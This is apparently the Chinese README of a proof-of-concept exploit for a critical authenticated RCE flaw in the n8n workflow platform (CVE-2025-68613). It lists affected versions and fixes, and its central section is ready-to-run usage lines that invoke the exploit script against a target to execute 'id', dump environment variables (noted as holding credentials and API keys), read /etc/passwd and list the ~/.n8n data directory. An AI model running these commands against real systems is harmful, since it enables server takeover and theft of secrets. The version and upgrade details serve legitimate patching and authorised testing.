仅限教育和授权安全研究用途。
n8n 工作流自动化平台中存在的严重 RCE 漏洞(CVSS 9.9)。已验证用户可通过 executeCommand 节点绕过沙箱限制,执行任意操作系统命令。
| 字段 | 详情 |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9(严重) |
| 受影响版本 | >= 0.211.0 < 1.120.4 |
| 需要认证 | 是(任何拥有工作流创建权限的用户) |
| 测试版本 | n8n 1.119.1 |
| 修复版本 | 1.120.4、1.121.1、1.122.0 |
n8n 在服务端评估工作流节点参数。executeCommand 节点直接以 n8n 进程的权限在主机上运行 shell 命令。任何经过身份验证且拥有工作流创建或编辑权限的用户均可利用此漏洞实现完全 RCE。
bash poc_final.sh <target> <email> <password> <command>
示例:
# 基础 RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# 读取环境变量(可能包含凭据/API密钥)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# 读取敏感文件
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# 列出 n8n 数据目录
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
注意: 如果密码中包含特殊字符(如
!),请使用单引号。
立即升级到 n8n >= 1.120.4。
如果无法立即升级:
本工具仅提供用于教育目的和授权安全测试。未经授权对您不拥有或没有明确书面许可的系统进行使用是非法的。作者对任何滥用行为不承担责任。